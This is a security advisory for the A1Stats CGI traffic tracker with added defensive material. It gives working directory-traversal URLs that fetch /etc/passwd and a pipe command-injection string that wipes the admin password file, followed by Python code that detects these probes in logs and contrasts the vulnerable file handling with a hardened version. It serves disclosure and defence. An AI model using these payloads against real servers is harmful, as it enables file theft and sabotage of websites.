[ Advisory for A1Stats ]
[ A1Stats is made by Drummond Miles ]
[ Site: http://www.gadnet.com/a1stats ]
[ by nemesystm of the DHC ]
[ (http://dhcorp.cjb.net - firstname.lastname@example.org) ]
[ ADV-0114 ]
/-|=[explanation]=|-\
A1Stats is a CGI package that tracks website traffic. It has two problems: a directory-traversal bug that lets anyone read any file the web server's user can read, and a command-injection bug that lets anyone overwrite (or otherwise damage) existing files.
/-|=[who is vulnerable]=|-\
Anyone running a copy of A1Stats downloaded before 24/04/01.
/-|=[testing it]=|-\
To test these vulnerabilities, try the following:

www.server.com/cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd
www.server.com/cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd

These two return /etc/passwd. The scripts take the query string as a file name without filtering ".." (the seven levels of ../ are there to climb out of whatever directory the scripts prefix to it and reach the filesystem root), so any file readable by the web server's user can be fetched the same way.

www.server.com/cgi-bin/a1stats/a1disp2.cgi?../../../../../../../etc/passwd

This one also returns /etc/passwd, but badly mangled, because a1disp2.cgi wraps the contents in HTML tags as if it were a file it had created itself.
One can also open a file and wreck its contents:

http://localhost/cgi-bin/a1stats/a1disp.cgi?|echo%20>a1admin.txt|

This empties a1admin.txt. The pipe characters are the tell: the script hands the parameter to an open() call that treats a name ending in "|" as a shell command to run, so the "file name" is executed and the echo redirection truncates a1admin.txt. a1admin.txt holds the password used to change the CGI's settings, so once it has been emptied nobody can log in anymore. Since a shell runs whatever sits between the pipes, nothing limits the injected command to echo; it runs with the web server's privileges.
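The probes above leave distinctive traces in the web server's access log. The following scanner is an added example, not part of this advisory, and the log lines in it are constructed (Apache combined format); the legitimate-looking parameter "daily" is a placeholder, since A1Stats' real parameter names are not given here. It decodes the query string first so URL-encoded variants (%2F, %7C) are caught as well.

```python
import re
from urllib.parse import unquote

# Added example, not part of the advisory: scan access-log lines for the
# A1Stats probes shown above.  Sample lines below are constructed.

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)
# Matches a1disp.cgi, a1disp2.cgi, a1disp3.cgi and a1disp4.cgi with a query string.
A1STATS_RE = re.compile(r"/a1stats/(?P<script>a1disp\d?\.cgi)\?(?P<arg>.*)$")


def classify_probe(url):
    """Return (script, reasons) if the URL looks like one of the probes, else None."""
    m = A1STATS_RE.search(url)
    if not m:
        return None
    arg = unquote(m.group("arg"))          # catches %2F / %7C encoded variants
    reasons = []
    if "../" in arg or "..\\" in arg:
        reasons.append("directory traversal")
    if "|" in arg:
        reasons.append("pipe/command injection")
    return (m.group("script"), reasons) if reasons else None


def find_a1stats_probes(lines):
    """Parse combined-format lines and return one dict per suspicious request."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        found = classify_probe(m.group("url"))
        if found:
            script, reasons = found
            hits.append({"ip": m.group("ip"), "time": m.group("ts"),
                         "script": script, "status": m.group("status"),
                         "reasons": reasons})
    return hits


# Constructed sample log: two traversal attempts, one pipe injection,
# one ordinary A1Stats request (parameter name "daily" is a placeholder)
# and one unrelated request.
SAMPLE_LOG = [
    '203.0.113.5 - - [25/Apr/2001:10:12:03 +0200] "GET /cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd HTTP/1.0" 200 1843 "-" "Mozilla/4.0"',
    '203.0.113.5 - - [25/Apr/2001:10:12:41 +0200] "GET /cgi-bin/a1stats/a1disp.cgi?|echo%20>a1admin.txt| HTTP/1.0" 200 0 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [25/Apr/2001:11:00:00 +0200] "GET /cgi-bin/a1stats/a1disp3.cgi?daily HTTP/1.0" 200 512 "-" "Mozilla/4.0"',
    '198.51.100.9 - - [25/Apr/2001:11:05:13 +0200] "GET /index.html HTTP/1.0" 200 2048 "-" "Mozilla/4.0"',
    '203.0.113.5 - - [25/Apr/2001:11:09:58 +0200] "GET /cgi-bin/a1stats/a1disp4.cgi?..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.0" 404 210 "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    for hit in find_a1stats_probes(SAMPLE_LOG):
        print(f'{hit["ip"]} {hit["time"]} {hit["script"]} -> '
              f'{", ".join(hit["reasons"])} (HTTP {hit["status"]})')
```

The status code is worth keeping: a 404 shows someone probed for the scripts without finding them, while a 200 with a non-trivial byte count on a passwd request is a good sign the file really went out.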
/-|=[fix]=|-\
Downloading the latest version (24/04/01 or later) will solve this problem. Until it is installed, block access to the a1stats directory, or at least reject any request to it whose query string contains ".." or "|".
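To show what the fix has to change, here is an added example (not A1Stats code, and not from this advisory) that emulates the vulnerable file handling in Python next to a hardened replacement, and replays the two payloads from the testing section against both. It assumes the real scripts prefix their data directory to the query string and hand the result to a Perl-style two-argument open(); the directory layout, the a1admin.txt and hits.log contents and the fake passwd file are all constructed.

```python
import os
import re
import subprocess
import tempfile

# Added example, not code from A1Stats or from this advisory.
# ASSUMPTION: the real CGI does the equivalent of open(FH, "$data_dir/$param")
# in Perl; the file layout built in demo() is constructed.


def vulnerable_open(param, data_dir):
    """Behave like a CGI that does open(FH, "$data_dir/$param") in Perl."""
    target = os.path.join(data_dir, param.strip())
    if target.endswith("|"):
        # Two-argument open() treats "cmd |" as "run cmd, read its stdout".
        # Here "cmd" is "<data_dir>/|echo >a1admin.txt": the shell fails to
        # execute the directory, but the second stage of the pipeline still
        # runs, in the CGI's working directory and with its privileges.
        proc = subprocess.run(target[:-1], shell=True, cwd=data_dir,
                              stdout=subprocess.PIPE, stderr=subprocess.DEVNULL,
                              check=False)
        return "ran-command", proc.stdout.decode("utf-8", "replace")
    # No pipe: the name is opened as given, so "../" segments walk out of
    # data_dir and any file readable by the web server's user comes back.
    with open(target, "r", encoding="utf-8", errors="replace") as fh:
        return "read-file", fh.read()


# Hardened replacement: allow-list the characters (no "/", ".." or "|"),
# then confirm the resolved path is a direct child of the data directory.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9_.-]*$")


def safe_open(param, data_dir):
    """Read a file under data_dir, refusing anything that is not a plain name."""
    if not SAFE_NAME.match(param):
        raise ValueError("rejected: disallowed characters in file name")
    base = os.path.realpath(data_dir)
    path = os.path.realpath(os.path.join(base, param))
    if os.path.dirname(path) != base:          # belt and braces (symlinks)
        raise ValueError("rejected: path escapes the data directory")
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        return fh.read()


def demo():
    """Replay the advisory's payloads against both handlers in a scratch tree."""
    results = {}
    with tempfile.TemporaryDirectory() as root:
        data_dir = os.path.join(root, "cgi-bin", "a1stats")
        os.makedirs(data_dir)
        os.makedirs(os.path.join(root, "etc"))
        admin_file = os.path.join(data_dir, "a1admin.txt")
        with open(admin_file, "w") as fh:
            fh.write("secret-admin-password\n")           # constructed stand-in
        with open(os.path.join(data_dir, "hits.log"), "w") as fh:
            fh.write("10 hits\n")                         # constructed stand-in
        with open(os.path.join(root, "etc", "passwd"), "w") as fh:
            fh.write("root:x:0:0:root:/root:/bin/sh\n")   # constructed stand-in

        # Two levels of ../ reach <root>/etc in this tree; the advisory's seven
        # levels are simply enough to reach the real filesystem root.
        traversal = "../../etc/passwd"
        injection = "|echo >a1admin.txt|"

        kind, body = vulnerable_open(traversal, data_dir)
        results["traversal_leaks_passwd"] = kind == "read-file" and body.startswith("root:")

        vulnerable_open(injection, data_dir)
        with open(admin_file) as fh:
            leftover = fh.read()
        # "echo >file" leaves a lone newline behind, so the password is gone.
        results["admin_password_wiped"] = "secret-admin-password" not in leftover

        for label, name in (("traversal", traversal), ("pipe", injection)):
            try:
                safe_open(name, data_dir)
                results["hardened_rejects_" + label] = False
            except ValueError:
                results["hardened_rejects_" + label] = True
        results["hardened_serves_valid"] = safe_open("hits.log", data_dir) == "10 hits\n"
    return results


if __name__ == "__main__":
    for check, ok in demo().items():
        print(f"{check}: {'ok' if ok else 'FAILED'}")
```

The allow-list is the part that matters: filtering out ".." and "|" individually would still leave other shell metacharacters and encodings to worry about, whereas permitting only a plain file name and then checking the resolved path closes both holes at once.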